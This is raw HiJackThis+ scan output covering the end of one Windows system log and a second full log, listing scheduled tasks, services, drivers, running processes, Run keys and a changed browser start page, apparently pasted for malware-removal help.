O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{F60DA91C-C96E-4948-A6CF-2973F5BE7F26} - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem134.0.6985.0{1653A49C-BDC2-4859-A2B6-93F49F39DCAD} - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: Feature Manager - C:\Program Files (x86)\Feature Manager\Feature_Manager.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: OmApSvcBroker - C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: ZoomUpdateTaskUser-S-1-5-21-3642336869-4069828061-3843680770-1001 - C:\Users\Cihan\AppData\Roaming\Zoom\bin\Zoom.exe --action=UpdateSchedule (sign: 'Zoom Video Communications, Inc.')
O23 - Service R2: Intel(R) Graphics Command Center Service - (igccservice) - C:\WINDOWS\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Innovation Platform Framework Service - (ipfsvc) - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Management Engine WMI Provider Registration - (WMIRegistrationService) - C:\WINDOWS\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (sign: 'Intel Corporation')
O23 - Service R2: Micro Star SCM - C:\WINDOWS\SysWOW64\MSIService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: Microsoft Defender Çekirdek Hizmeti - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R2: MSI Foundation Service - C:\Program Files (x86)\Feature Manager\MSIAPService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem /ert (sign: 'NVIDIA Corporation')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service S2: Google Güncelleyici Dahili Hizmeti (GoogleUpdaterInternalService134.0.6985.0) - (GoogleUpdaterInternalService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S2: Google Güncelleyici Hizmeti (GoogleUpdaterService134.0.6985.0) - (GoogleUpdaterService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S3: FACEITService - C:\Program Files\FACEIT AC\faceitservice.exe (sign: 'ESL FACEIT Group Ltd.')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\132.0.6834.197\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: NVIDIA FrameView SDK service - (FvSvc) - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe -service (sign: 'NVIDIA Corporation')
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Driver R1: FACEIT - C:\Program Files\FACEIT AC\FACEIT_AC.sys (sign: 'Microsoft' - no company)
O23 - Driver R3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw14) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_477c028818b7a796\Netwtw14.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) GNA Scoring Accelerator service - (IntelGNA) - C:\WINDOWS\System32\DriverStore\FileRepository\gna.inf_amd64_04d4eecc5838a558\gna.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) HID Event Filter - (HidEventFilter) - C:\WINDOWS\System32\DriverStore\FileRepository\hideventfilter.inf_amd64_8b4344345b8897be\HidEventFilter.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Management Engine Interface  - (MEIx64) - C:\WINDOWS\System32\DriverStore\FileRepository\heci.inf_amd64_6b6e8cc42a3d1f09\x64\TeeDriverW10x64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO GPIO Driver v2 - (iaLPSS2_GPIO2_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_302e75596cffa74a\iaLPSS2_GPIO2_ADL.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO I2C Driver v2 - (iaLPSS2_I2C_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_e736c048ca307ed2\iaLPSS2_I2C_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Wireless Bluetooth(R) - (ibtusb) - C:\WINDOWS\System32\DriverStore\FileRepository\ibtusb.inf_amd64_4d48e97cd3587c52\ibtusb.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology BUS - (IntcAudioBus) - C:\WINDOWS\System32\DriverStore\FileRepository\intcaudiobus.inf_amd64_799c962c58e6bfeb\IntcAudioBus.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® Audio - (IntcBTAu) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtau.inf_amd64_164a440e6b400316\IntcBTAu.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® LE Audio - (IntcBtLE) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtle.inf_amd64_0c9aadaff32d0209\IntcBtLE.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Digital Microphones - (IntcDMic) - C:\WINDOWS\System32\DriverStore\FileRepository\intcdmic.inf_amd64_acd402699ea3db34\IntcDMic.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for USB Audio - (IntcUSB) - C:\WINDOWS\System32\DriverStore\FileRepository\intcusb.inf_amd64_c2a06a639869c7cd\IntcUSB.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology OED - (IntcOED) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\IntcOED.sys (sign: 'Intel Corporation')
O23 - Driver R3: ipf_acpi - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_0bbfb278918dfdd5\ipf_acpi.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_cpu - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_cpu.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_lf - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_lf.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: nvlddmkm - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\nvlddmkm.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: NVPCF Service - (nvpcf) - C:\WINDOWS\System32\drivers\nvpcf.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Realtek NetAdapter Driver - (rt68cx21) - C:\WINDOWS\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_81b332badcdcaabe\rt68cx21x64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver S3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw12) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_9e7b9e1ba7e74592\Netwtw12.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver S3: igfxn - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_4ec1a03daa49235f\igdkmdn64.sys (sign: 'Intel Corporation')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw12'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service:  'Netwtw14'
O26 - Office Addin: HKLM\..\MicrosoftDataStreamerforExcel - (Microsoft Data Streamer for Excel) -> C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto (not signed - no company - A9DA61511D2073E5B80ED742394B35C61D96DE3A)
O26 - Office Addin: HKLM\..\NativeShim - (Inquire) -> (no file)


--
End of file - Time spent: 20,4 sec. - 45262 bytes, CRC32: FFFFFFFF. Sign: ۄ

Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform: x64 Windows 11 (Home Single Language), 10.0.26100.3476 (ReleaseId: 2009, 24H2), Service Pack: 0
Time: 15.03.2025 - 16:56 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Memory: 6,32 GiB Free / 16. Loading RAM (59 %), CPU (36 %)
Disk C: 68,32 GiB Free / 476 (SSD, GPT)
Elevated: Yes.
Ran by: eymen (group: Administrators; type: Microsoft) on DESKTOP-JRKUDT8, FirstRun: yes.

Chrome: 134.0.6998.89
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: On) (Code Integrity: On)

Running processes:
Number | Path.
 1 C:\GHelper.exe
 4 C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe
 1 C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe
 1 C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe
 1 C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
 1 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
 1 C:\Program Files (x86)\Common Files\Steam\SteamService.exe
 2 C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe
 1 C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
 2 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avp.exe
 1 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avpui.exe
 1 C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\plugins_nms.exe
 1 C:\Program Files (x86)\LightingService\LightingService.exe
 7 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 7 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.92\msedgewebview2.exe
 8 C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
 1 C:\Program Files (x86)\Steam\steam.exe
 1 C:\Program Files\ASUS\AacAmbientHal\AacAmbientLighting.exe
 1 C:\Program Files\ASUS\ROG Live Service\ROGLiveService.exe
 1 C:\Program Files\ESET\ESET Security\efwd.exe
 1 C:\Program Files\ESET\ESET Security\eguiProxy.exe
 1 C:\Program Files\ESET\ESET Security\ekrn.exe
 13 C:\Program Files\Google\Chrome\Application\chrome.exe
 1 C:\Program Files\LGHUB\lghub_agent.exe
 1 C:\Program Files\LGHUB\lghub_updater.exe
 1 C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe
 1 C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
 1 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
 1 C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
 4 C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
 5 C:\Program Files\NVIDIA Corporation\NVIDIA app\CEF\NVIDIA Overlay.exe
 1 C:\Program Files\NVIDIA Corporation\NVIDIA app\ShadowPlay\nvsphelper64.exe
 1 C:\Program Files\Riot Vanguard\vgtray.exe
 1 C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.144.0_x64__97hta09mmv6hy\Build\Lively.exe
 1 C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.144.0_x64__97hta09mmv6hy\Build\Plugins\Mpv\mpv.exe
 1 C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2509.4.0_x64__cv1g1gvanyjgm\WhatsApp.exe
 6 C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.137.3425.0_x64__kzf8qxf38zg5c\Skype\Skype.exe
 1 C:\Program Files\WindowsApps\Microsoft.WidgetsPlatformRuntime_1.6.2.0_x64__8wekyb3d8bbwe\WidgetService\WidgetService.exe
 1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25021.67.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
 1 C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_525.5100.30.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe
 1 C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.25021.28.0_x64__cw5n1h2txyewy\CrossDeviceService.exe
 1 C:\ProgramData\ASUS\AsusSurvey\AsusSurvey.exe
 1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe
 1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MsMpEng.exe
 1 C:\Users\eymen\Downloads\HiJackThis.exe
 1 C:\Windows\explorer.exe
 1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
 1 C:\Windows\System32\AggregatorHost.exe
 1 C:\Windows\System32\ApplicationFrameHost.exe
 1 C:\Windows\System32\ASUSACCI\ArmouryCrateControlInterface.exe
 1 C:\Windows\System32\ASUSACCI\ArmouryCrateKeyControl.exe
 1 C:\Windows\System32\audiodg.exe
 2 C:\Windows\System32\backgroundTaskHost.exe
 1 C:\Windows\System32\cmd.exe
 1 C:\Windows\System32\conhost.exe
 2 C:\Windows\System32\csrss.exe
 1 C:\Windows\System32\ctfmon.exe
 2 C:\Windows\System32\dllhost.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\AsusAppService\AsusAppService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimization.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimizationStartupTask.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOSD.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManager.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManagerAgent.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSwitch\AsusSwitch.exe
 2 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
 1 C:\Windows\System32\DriverStore\FileRepository\DAX3_S~2.INF\DAX3API.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dax3_swc_aposvc.inf_amd64_8e54c1bc7d581ad1\DAX3API.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_12a05294eb98ea3c\ipfsvc.exe
 1 C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_a687edda40db3316\OneApp.IGCC.WinService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\IntelCpHDCPSvc.exe
 1 C:\Windows\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\AS\IAS\IntelAudioService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_helper.exe
 1 C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_uf.exe
 1 C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe
 1 C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
 2 C:\Windows\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\NVDisplay.Container.exe
 1 C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_ee1169deb7ec6a42\Intel_PIE_Service.exe
 2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe
 1 C:\Windows\System32\dwm.exe
 2 C:\Windows\System32\fontdrvhost.exe
 1 C:\Windows\System32\LsaIso.exe
 1 C:\Windows\System32\lsass.exe
 1 C:\Windows\System32\NgcIso.exe
 1 C:\Windows\System32\oobe\UserOOBEBroker.exe
 10 C:\Windows\System32\RuntimeBroker.exe
 1 C:\Windows\System32\SearchFilterHost.exe
 1 C:\Windows\System32\SearchIndexer.exe
 1 C:\Windows\System32\SearchProtocolHost.exe
 1 C:\Windows\System32\SecurityHealthService.exe
 1 C:\Windows\System32\SecurityHealthSystray.exe
 1 C:\Windows\System32\services.exe
 1 C:\Windows\System32\ShellHost.exe
 1 C:\Windows\System32\sihost.exe
 1 C:\Windows\System32\smartscreen.exe
 1 C:\Windows\System32\smss.exe
 1 C:\Windows\System32\spoolsv.exe
 89 C:\Windows\System32\svchost.exe
 2 C:\Windows\System32\taskhostw.exe
 2 C:\Windows\System32\wbem\unsecapp.exe
 3 C:\Windows\System32\wbem\WmiPrvSE.exe
 1 C:\Windows\System32\wininit.exe
 1 C:\Windows\System32\winlogon.exe
 1 C:\Windows\System32\wlanext.exe
 3 C:\Windows\System32\WUDFHost.exe
 1 C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
 1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
 1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
 1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
 1 C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
 1 C:\Windows\TbtP2pShortcutService.exe
 1 C:\Windows\ThunderboltService.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = hxxp://vvv.joygame.com/games.aspx?g=2001
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_441\bin\jp2ssv.dll (sign: 'Oracle America, Inc.')
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_441\bin\ssv.dll (sign: 'Oracle America, Inc.')
O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\134.0.6998.89\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\Run: [EpicGamesLauncher] = C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe -silent -launchcontext=boot (sign: 'Epic Games Inc.')
O4 - HKCU\..\Run: [LGHUB] = C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe --minimized (sign: 'Logitech Inc')
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_E3D834145B9E086748646FF8637E21CC] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start (sign: 'Microsoft')
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\Run: [RiotClient] = C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode (2025/03/03) (sign: 'Riot Games, Inc.')
O4 - HKLM\..\Run: [egui] = C:\Program Files\ESET\ESET Security\ecmds.exe /run /hide /proxy (sign: 'ESET, spol. s r.o.')
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe (sign: 'Riot Games, Inc.')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O4-32 - HKLM\..\Run: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (sign: 'Oracle America, Inc.')
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/octet-stream: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-complus: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-msdownload: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
